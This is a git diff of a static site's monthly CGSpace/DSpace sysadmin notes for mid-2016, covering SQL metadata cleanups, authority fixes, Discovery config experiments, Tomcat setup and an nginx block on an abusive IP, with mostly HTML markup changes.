<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
UPDATE 95
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
text_value
------------
(0 rows)
@ -158,7 +158,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<li>We <em>really</em> only need <code>statistics</code> and <code>authority</code> but meh</li>
<li>Fix metadata for species on DSpace Test:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p &#39;fuuu&#39;
</code></pre><ul>
<li>Will run later on CGSpace</li>
<li>A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is &ldquo;ungraded&rdquo;</li>
@ -169,7 +169,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<ul>
<li>Delete 23 blank metadata values from CGSpace:</li>
</ul>
<pre><code>cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>cgspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 23
</code></pre><ul>
<li>Complete phase three of metadata migration, for the following fields:
@ -188,9 +188,9 @@ DELETE 23
</li>
<li>Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>I then ran all server updates and rebooted the server</li>
</ul>
@ -198,7 +198,7 @@ $ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Dele
<ul>
<li>Doing some author cleanups from Peter and Abenet:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Authors-Fix-205-UTF8.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Authors-Fix-205-UTF8.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
$ ./delete-metadata-values.py -f dc.contributor.author -i /tmp/Authors-Delete-UTF8.csv -m 3 -u dspacetest -d dspacetest -p fuuu
</code></pre><h2 id="2016-07-13">2016-07-13</h2>
<ul>
@ -215,20 +215,20 @@ $ ./delete-metadata-values.py -f dc.contributor.author -i /tmp/Authors-Delete-UT
<li>Add species and breed to the XMLUI item display</li>
<li>CGSpace crashed late at night and the DSpace logs were showing:</li>
</ul>
<pre><code>2016-07-18 20:26:30,941 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-07-18 20:26:30,941 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
...
</code></pre><ul>
<li>I suspect it&rsquo;s someone hitting REST too much:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
710 66.249.78.38
1781 181.118.144.29
24904 70.32.99.142
</code></pre><ul>
<li>I just blocked access to <code>/rest</code> for that last IP for now:</li>
</ul>
<pre><code> # log rest requests
<pre tabindex="0"><code> # log rest requests
location /rest {
access_log /var/log/nginx/rest.log;
proxy_pass http://127.0.0.1:8443;
@ -248,23 +248,23 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>We might need to use <code>index.authority.ignore-prefered=true</code> to tell the Discovery index to prefer the variation that exists in the metadatavalue rather than what it finds in the authority cache.</li>
<li>Trying these on DSpace Test after a discussion by Daniel Scharon on the dspace-tech mailing list:</li>
</ul>
<pre><code>index.authority.ignore-prefered.dc.contributor.author=true
<pre tabindex="0"><code>index.authority.ignore-prefered.dc.contributor.author=true
index.authority.ignore-variants.dc.contributor.author=false
</code></pre><ul>
<li>After reindexing I don&rsquo;t see any change in Discovery&rsquo;s display of authors, and still have entries like:</li>
</ul>
<pre><code>Grace, D. (464)
<pre tabindex="0"><code>Grace, D. (464)
Grace, D. (62)
</code></pre><ul>
<li>I asked for clarification of the following options on the DSpace mailing list:</li>
</ul>
<pre><code>index.authority.ignore
<pre tabindex="0"><code>index.authority.ignore
index.authority.ignore-prefered
index.authority.ignore-variants
</code></pre><ul>
<li>In the mean time, I will try these on DSpace Test (plus a reindex):</li>
</ul>
<pre><code>index.authority.ignore=true
<pre tabindex="0"><code>index.authority.ignore=true
index.authority.ignore-prefered=true
index.authority.ignore-variants=true
</code></pre><ul>
@ -272,7 +272,7 @@ index.authority.ignore-variants=true
<li>It was misconfigured and disabled, but already working for some reason <em>sigh</em></li>
<li>&hellip; no luck. Trying with just:</li>
</ul>
<pre><code>index.authority.ignore=true
<pre tabindex="0"><code>index.authority.ignore=true
</code></pre><ul>
<li>After re-indexing and clearing the XMLUI cache nothing has changed</li>
</ul>
@ -280,7 +280,7 @@ index.authority.ignore-variants=true
<ul>
<li>Trying a few more settings (plus reindex) for Discovery on DSpace Test:</li>
</ul>
<pre><code>index.authority.ignore-prefered.dc.contributor.author=true
<pre tabindex="0"><code>index.authority.ignore-prefered.dc.contributor.author=true
index.authority.ignore-variants=true
</code></pre><ul>
<li>Run all OS updates and reboot DSpace Test server</li>
@ -291,7 +291,7 @@ index.authority.ignore-variants=true
<ul>
<li>The DSpace source code mentions the configuration key <code>discovery.index.authority.ignore-prefered.*</code> (with prefix of discovery, despite the docs saying otherwise), so I&rsquo;m trying the following on DSpace Test:</li>
</ul>
<pre><code>discovery.index.authority.ignore-prefered.dc.contributor.author=true
<pre tabindex="0"><code>discovery.index.authority.ignore-prefered.dc.contributor.author=true
discovery.index.authority.ignore-variants=true
</code></pre><ul>
<li>Still no change!</li>
@ -325,15 +325,15 @@ discovery.index.authority.ignore-variants=true
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -42,7 +42,7 @@ $ git checkout -b 55new 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.5
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -72,12 +72,12 @@ $ git rebase -i dspace-5.5
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -124,7 +124,7 @@ $ git rebase -i dspace-5.5
<time datetime="2016-08-01T15:53:00+03:00">Mon Aug 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -137,7 +137,7 @@ $ git rebase -i dspace-5.5
<li>Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of <code>fonts</code>)</li>
<li>Start working on DSpace 5.15.5 port:</li>
</ul>
<pre><code>$ git checkout -b 55new 5_x-prod
<pre tabindex="0"><code>$ git checkout -b 55new 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.5
</code></pre><ul>
@ -166,7 +166,7 @@ $ git rebase -i dspace-5.5
<li>Fix item display incorrectly displaying Species when Breeds were present (<a href="https://github.com/ilri/DSpace/pull/260">#260</a>)</li>
<li>Experiment with fixing more authors, like Delia Grace:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where metadata_field_id=3 and text_value=&#39;Grace, D.&#39;;
</code></pre><h2 id="2016-08-06">2016-08-06</h2>
<ul>
<li>Finally figured out how to remove &ldquo;View/Open&rdquo; and &ldquo;Bitstreams&rdquo; from the item view</li>
@ -184,15 +184,15 @@ $ git rebase -i dspace-5.5
<li>Install latest Oracle Java 8 JDK</li>
<li>Create <code>setenv.sh</code> in Tomcat 8 <code>libexec/bin</code> directory:</li>
</ul>
<pre><code>CATALINA_OPTS=&quot;-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8&quot;
CATALINA_OPTS=&quot;$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib&quot;
<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8&#34;
CATALINA_OPTS=&#34;$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib&#34;
JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
</code></pre><ul>
<li>Edit Tomcat 8 <code>server.xml</code> to add regular HTTP listener for solr</li>
<li>Symlink webapps:</li>
</ul>
<pre><code>$ rm -rf /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
<pre tabindex="0"><code>$ rm -rf /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
$ ln -sv ~/dspace/webapps/xmlui /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
$ ln -sv ~/dspace/webapps/oai /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/oai
$ ln -sv ~/dspace/webapps/jspui /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/jspui
@ -246,7 +246,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
<li>Fix &ldquo;CONGO,DR&rdquo; country name in <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/264">#264</a>)</li>
<li>Also need to fix existing records using the incorrect form in the database:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;CONGO, DR&#39; where resource_type_id=2 and metadata_field_id=228 and text_value=&#39;CONGO,DR&#39;;
</code></pre><ul>
<li>I asked a question on the DSpace mailing list about updating &ldquo;preferred&rdquo; forms of author names from ORCID</li>
</ul>
@ -262,7 +262,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
<ul>
<li>Database migrations are fine on DSpace 5.1:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace database info
<pre tabindex="0"><code>$ ~/dspace/bin/dspace database info
Database URL: jdbc:postgresql://localhost:5432/dspacetest
Database Schema: public
@ -300,12 +300,12 @@ Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 90
<li>Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB</li>
<li>They said I should delete the Atmire migrations</li>
</ul>
<pre><code>dspacetest=# delete from schema_version where description = 'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
dspacetest=# delete from schema_version where description = 'Atmire MQM migration' and version='5.1.2015.12.03.3';
<pre tabindex="0"><code>dspacetest=# delete from schema_version where description = &#39;Atmire CUA 4 migration&#39; and version=&#39;5.1.2015.12.03.2&#39;;
dspacetest=# delete from schema_version where description = &#39;Atmire MQM migration&#39; and version=&#39;5.1.2015.12.03.3&#39;;
</code></pre><ul>
<li>After that DSpace starts up by XMLUI now has unrelated issues that I need to solve!</li>
</ul>
<pre><code>org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
<pre tabindex="0"><code>org.apache.avalon.framework.configuration.ConfigurationException: Type &#39;ThemeResourceReader&#39; does not exist for &#39;map:read&#39; at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
</code></pre><ul>
<li>Looks like we&rsquo;re missing some stuff in the XMLUI module&rsquo;s <code>sitemap.xmap</code>, as well as in each of our XMLUI themes</li>
@ -324,18 +324,18 @@ context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
<li>Clean up and import 48 CCAFS records into DSpace Test</li>
<li>SQL to get all journal titles from dc.source (55), since it&rsquo;s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ &#39;.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*&#39;;
</code></pre><h2 id="2016-08-25">2016-08-25</h2>
<ul>
<li>Atmire suggested adding a missing bean to <code>dspace/config/spring/api/atmire-cua.xml</code> but it doesn&rsquo;t help:</li>
</ul>
<pre><code>...
Error creating bean with name 'MetadataStorageInfoService'
<pre tabindex="0"><code>...
Error creating bean with name &#39;MetadataStorageInfoService&#39;
...
</code></pre><ul>
<li>Atmire sent an updated version of <code>dspace/config/spring/api/atmire-cua.xml</code> and now XMLUI starts but gives a null pointer exception:</li>
</ul>
<pre><code>Java stacktrace: java.lang.NullPointerException
<pre tabindex="0"><code>Java stacktrace: java.lang.NullPointerException
at org.dspace.app.xmlui.aspect.statistics.Navigation.addOptions(Navigation.java:129)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:228)
at sun.reflect.GeneratedMethodAccessor126.invoke(Unknown Source)
@ -350,8 +350,8 @@ Error creating bean with name 'MetadataStorageInfoService'
</code></pre><ul>
<li>Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:</li>
</ul>
<pre><code>$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
$ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
<pre tabindex="0"><code>$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
</code></pre><ul>
<li>Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs</li>
</ul>
@ -360,7 +360,7 @@ $ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/b
<li>CGSpace had issues tonight, not entirely crashing, but becoming unresponsive</li>
<li>The dspace log had this:</li>
</ul>
<pre><code>2016-08-26 20:48:05,040 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
<pre tabindex="0"><code>2016-08-26 20:48:05,040 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>Related to /rest no doubt</li>
</ul>
@ -389,15 +389,15 @@ $ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/b
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -14,7 +14,7 @@ Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-09/" />
@ -32,9 +32,9 @@ Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=or
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -116,7 +116,7 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=or
<time datetime="2016-09-01T15:53:00+03:00">Thu Sep 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -127,11 +127,11 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=or
<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
<li>It looks like we might be able to use OUs now, instead of DCs:</li>
</ul>
<pre><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
</code></pre><ul>
<li>User who has been migrated to the root vs user still in the hierarchical structure:</li>
</ul>
<pre><code>distinguishedName: CN=Last\, First (ILRI),OU=ILRI Kenya Employees,OU=ILRI Kenya,OU=ILRIHUB,DC=CGIARAD,DC=ORG
<pre tabindex="0"><code>distinguishedName: CN=Last\, First (ILRI),OU=ILRI Kenya Employees,OU=ILRI Kenya,OU=ILRIHUB,DC=CGIARAD,DC=ORG
distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Ethiopia,DC=ILRI,DC=CGIARAD,DC=ORG
</code></pre><ul>
<li>Changing the DSpace LDAP config to use <code>OU=ILRIHUB</code> seems to work:</li>
@ -140,17 +140,17 @@ distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Eth
<ul>
<li>Notes for local PostgreSQL database recreation from production snapshot:</li>
</ul>
<pre><code>$ dropdb dspacetest
<pre tabindex="0"><code>$ dropdb dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
$ psql dspacetest -c 'alter user dspacetest createuser;'
$ psql dspacetest -c &#39;alter user dspacetest createuser;&#39;
$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
$ psql dspacetest -c &#39;alter user dspacetest nocreateuser;&#39;
$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
$ vacuumdb dspacetest
</code></pre><ul>
<li>Some names that I thought I fixed in July seem not to be:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
text_value | authority | confidence
-----------------------+--------------------------------------+------------
Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb | 600
@ -163,12 +163,12 @@ $ vacuumdb dspacetest
</code></pre><ul>
<li>At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;c3a22456-8d6a-41f9-bba0-de51ef564d45&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
UPDATE 69
</code></pre><ul>
<li>And for Peter Ballantyne:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
text_value | authority | confidence
-------------------+--------------------------------------+------------
Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 | 600
@ -180,26 +180,26 @@ UPDATE 69
</code></pre><ul>
<li>Again, a few have the correct ORCID, but there should only be one authority&hellip;</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;4f04ca06-9a76-4206-bd9c-917ca75d278e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
UPDATE 58
</code></pre><ul>
<li>And for me:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, A%&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 1a1943a0-3f87-402f-9afe-e52fb46a513e | 600
(3 rows)
dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
dspacetest=# update metadatavalue set authority=&#39;1a1943a0-3f87-402f-9afe-e52fb46a513e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, %&#39;;
UPDATE 11
</code></pre><ul>
<li>And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
